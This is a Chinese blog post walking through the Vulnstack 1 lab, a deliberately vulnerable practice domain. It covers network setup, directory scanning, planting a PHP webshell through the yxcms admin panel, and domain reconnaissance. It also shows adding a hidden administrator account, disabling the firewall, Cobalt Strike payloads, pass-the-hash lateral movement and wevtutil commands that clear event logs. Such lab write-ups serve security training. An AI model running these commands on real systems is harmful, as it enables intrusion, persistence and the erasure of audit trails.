Vulnstack红日安全内网域渗透靶场1实战

已于 2024-08-21 22:03:28 修改
阅读量459 收藏 6
点赞数 6
文章标签: linux 运维 经验分享 安全 网络
于 2024-08-21 22:00:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79316009/article/details/141403600
版权

文章目录

新密码设置:hongrisec@2024
网络适配器的设置

根据vulnstack给的网络拓扑图,修改虚拟机的网络配适器
在这里插入图片描述
Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡)Win7 的网络适配器 1 设置成自定义( VMnet1 仅主机模式),网络适配器 2 设置成 NAT 模式
在这里插入图片描述
还要把虚拟网络的vment1改成192.168.52.0
在这里插入图片描述

改好之后,要去“网络连接”里面看一下,要保持一致,不一样的话就刷新

Win2003、Win2008 网络适配器设置成自定义(VMnet1仅主机模式)即可
在这里插入图片描述

Web服务器:
Windows7(内配有phpstudy web环境)
模拟外网ip:192.168.211.130
内网ip:192.168.52.143

域内主机:
Win2K3 Metasploitable
内网ip:192.168.52.141

域控:
Windows 2008
内网ip:192.168.52.138

以上内网无法与外网通信,只有win7可以连通内外网。

外网初探
win7里面的phpstudy

先外网初探一下
在这里插入图片描述

这里可以直接看到yxcms和phpmyadmin的东西
在这里插入图片描述

在这个web页面看见后台地址 ,嘻嘻嘻
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
根据yxcms的网上提示

登进后台

在这里插入图片描述

发现从这里进入可以直接编辑php的东西,那么应该也能webshell吧……
在这里插入图片描述

写入webshell并连接

直接新建tet.php写入一句话
在这里插入图片描述

接下来就要想办法找到这个acomment.php所在的目录了,用dirsearch扫

┌──(root💀kali)-[~]
└─# dirsearch -u http://192.168.211.130/yxcms                   
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.211.130/_yxcms_24-08-15_10-06-51.txt

Target: http://192.168.211.130/

[10:06:51] Starting: yxcms/
[10:06:53] 403 -  217B  - /yxcms/%3f/                                       
[10:06:53] 403 -  221B  - /yxcms/%C0%AE%C0%AE%C0%AF
[10:06:53] 404 -  209B  - /yxcms/%2e%2e//google.com                         
[10:06:53] 403 -  216B  - /yxcms/%ff                                        
[10:06:54] 403 -  226B  - /yxcms/.ht_wsr.txt                                
[10:06:54] 403 -  229B  - /yxcms/.htaccess.bak1                             
[10:06:54] 403 -  229B  - /yxcms/.htaccess.orig                             
[10:06:54] 403 -  229B  - /yxcms/.htaccess.save
[10:06:54] 403 -  229B  - /yxcms/.htaccess_orig
[10:06:54] 403 -  227B  - /yxcms/.htaccessOLD
[10:06:54] 403 -  227B  - /yxcms/.htaccessBAK
[10:06:54] 403 -  228B  - /yxcms/.htaccessOLD2
[10:06:54] 403 -  231B  - /yxcms/.htaccess.sample                           
[10:06:54] 403 -  220B  - /yxcms/.html
[10:06:54] 403 -  219B  - /yxcms/.htm
[10:06:54] 403 -  230B  - /yxcms/.htaccess_extra
[10:06:54] 403 -  227B  - /yxcms/.htaccess_sc                               
[10:06:54] 403 -  229B  - /yxcms/.htpasswd_test                             
[10:06:54] 403 -  226B  - /yxcms/.httr-oauth
[10:06:54] 403 -  225B  - /yxcms/.htpasswds                                 
[10:06:56] 404 -  242B  - /yxcms/\..\..\..\..\..\..\..\..\..\etc\passwd     
[10:06:56] 404 -  211B  - /yxcms/a%5c.aspx                                  
[10:07:03] 301 -  242B  - /yxcms/data  ->  http://192.168.211.130/yxcms/data/
[10:07:03] 200 -  314B  - /yxcms/data/                                      
[10:07:06] 200 -  214B  - /yxcms/httpd.ini                                  
[10:07:06] 403 -  231B  - /yxcms/index.php::$DATA                           
[10:07:07] 200 -   24KB - /yxcms/index.pHp                                  
[10:07:07] 200 -   24KB - /yxcms/index.php.                                 
[10:07:12] 301 -  244B  - /yxcms/public  ->  http://192.168.211.130/yxcms/public/
[10:07:12] 200 -  772B  - /yxcms/Public/                                    
[10:07:12] 200 -  772B  - /yxcms/public/                                    
[10:07:12] 200 -   83B  - /yxcms/robots.txt                                 
[10:07:16] 403 -  231B  - /yxcms/Trace.axd::$DATA                           
[10:07:16] 301 -  244B  - /yxcms/Upload  ->  http://192.168.211.130/yxcms/Upload/
[10:07:16] 301 -  244B  - /yxcms/upload  ->  http://192.168.211.130/yxcms/upload/
[10:07:16] 200 -  514B  - /yxcms/upload/                                    
[10:07:18] 403 -  232B  - /yxcms/web.config::$DATA                          
                                                                             
Task Completed

既然有robots.txt,直接进去,看到“被保护的”protected 目录,再结合已经知道一个yxcms/data
在这里插入图片描述

然后一步一步推断,拿到要的acomment.php路径
在这里插入图片描述

随便用一个shell连接器连接即可
在这里插入图片描述

内网探测

直接去终端看,发现是管理员
在这里插入图片描述

信息收集
ipconfig /all              #查看本机ip,所在域
route print                #打印路由信息
net view                   #查看局域网内其他主机名
arp -a                     #查看arp缓存
net start                  #查看开启了哪些服务
net share                  #查看开启了哪些共享
net share ipc$             #开启ipc共享
net share c$                 #开启c盘共享
net use 1\192.168.xx.xx\ipc$ "" /user:""      #与192.168.xx.xx建立空连接
net use \\192.168.xx\c$ "密码" /user:"用户名"  #建立c盘共享
dir l\192.168.xx.xx\c$\user                   #查看192.168.xx.xc盘user目录下的文件
net config workstation                        #查看计算机名,全名,用户名,系统版本,工作站,域,登录域
net user                                      #查看本机用户列表
net user /domain                              #查看域用户
net localgroup administrators                 #查看本地管理员组(通常会有域用户)
net view /domain                              #查看有几个域
net user 用户名 /domain                        #获取指定域用户的信息
net group p /domain                           #查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain                        #查看域中某工作组
net group "domain admins" /domain           #查看域管理员的名字
net group "domain computers" /domain          #查看域中的其他主机名
net group oup "doamin controllers" /domain    #查看域控制器(可能有多台)

在这里插入图片描述
在这里插入图片描述

该域名为god.org,域管理员为Administrator,域控为OWA$
在这里插入图片描述

路由信息
在这里插入图片描述

内网网段为192.168.52.1/24

用Ping命令探测域控的ip

 ping owa.god.org

可知域控ip为192.168.52.138
在这里插入图片描述

创建一个rayna用户,并加入管理组
net user rayna Fray@123 /add net localgroup administrators rayna /add
在这里插入图片描述

cs启动
在这里插入图片描述

蚁剑与cs联动

生成”有效载荷类的exe“ 的木马并上传和运行
在这里插入图片描述
在这里插入图片描述

上线之后关闭防火墙shell netsh advfirewall set allprofiles state off
在这里插入图片描述

提权

一般插件基本上都可以做到
在这里插入图片描述

抓取明文密码

在这里插入图片描述

内网横向

监听器需要新建一个SMB监听器这里命名”SMB“,对端连接的隧道选择system权限的
在这里插入图片描述

横向成功
在这里插入图片描述

权限维持(黄金票据)

抓取hash
在这里插入图片描述

几个用户的hash值明显都一样 直接pth攻击就行了

痕迹清除
shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

在这里插入图片描述

在这里插入图片描述

raynaEI
关注
红日-VulnStack靶场1
timesleep的博客
05-31 374
但是这里我的ms17_010没有攻击成功所以后面的步骤无法进行,按照思路的话,使用ms17_010攻击成功后可以拿到权限,进行权限提升。接下来我们对他的内网网段进行扫描,发现其他主机这里使用fscan,也可以使用arp -a来查看arp表。该端口为phpstudy探针页面,可以查看到敏感信息,如绝对路径,对其进行目录扫描。单网卡,仅主机,仅主机网卡地址为192.168.52.138。单网卡,仅主机,仅主机网卡地址为192.168.52.141。仅主机,仅主机网卡地址为192.168.52.143。
2024年网安最全Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84252281的博客
05-03 1905
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
红日vulnstack)1 内网渗透ATT&CK实战
m0_66299232的博客
02-27 859
8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3。kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4。开启之后数据库所有运行的日志会记录在general_log_file中。4.net use 发现建立成功后,上传木马程序。1.开启cs,生成木马,上传到蚁剑,执行。6.成功执行,whomi发现是系统权限。红日
内网渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6784
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
VulnStack靶场(一)
Lyaas的博客
06-02 1116
ATT&CK——VulnStack1红队(一)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 1685
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
2024年最新Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1695
内网靶场渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 945
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2216
红日靶场渗透教程
内网渗透实践——红日靶场
qq_42739469的博客
11-05 332
这一台web服务器具有外部的公网IP地址(192.168.5.134)也具有整个内部的内网ip,那么我们首先的思路就是拿下这一台web服务器作为我们入侵整个内网的跳板。直到成功创建会话,然后我们使用getuid来查看我们登陆的用户名称以及用户组,发现权限不够需要提权,于是我们使用getsystem进行提权。需要注意的是,在这样的设置中我们的监听主机应该设置跳板机的ip。在清晰了入侵目标以后,我们需要做的就是让kali上的更多工具能够访问到内网,我们才能更快更高效的拿下DC。
内网攻防实战红日靶场01(超超超超超超详细!!实操+AI问答,胎教级教程)
最新发布
weixin_46022776的博客
06-04 6237
问题:解决:日志功能未开启,OFF,执行sql开启ON。
红日内网渗透靶场1
weixin_47781572的博客
10-10 2227
官方下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
VulnStack靶场6
weixin_45568454的博客
11-04 348
打靶日记之VulnStack记录 记下了好多踩过的坑 以及一些小的心得体会
vulnstack系列靶场
aming小老弟
06-09 4054
靶场
Vulnstack靶场实战(一)
weixin_46066840的博客
09-13 1577
红日安全实战Vulnstack靶场实战(一)
Vulnstack内网靶场渗透(ATT&CK实战系列-红队评估(七))
DG_s1mple
04-18 6531
这么久没打vulnhub全是因为在吃这一套内网靶场(绝对没有在摸鱼 ),现在把我的思路写下来 前言 这是Vulnstack里的一套靶场,ATT&CK实战系列-红队评估(七) 这是靶场的链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 网络环境 整个靶场环境一共五个靶机(总共27.8 GB),分别位于三层网络环境中: DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192
红日安全靶场(一)学习笔记
qq_45244158的博客
09-22 2293
红日安全靶场(一)学习笔记
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值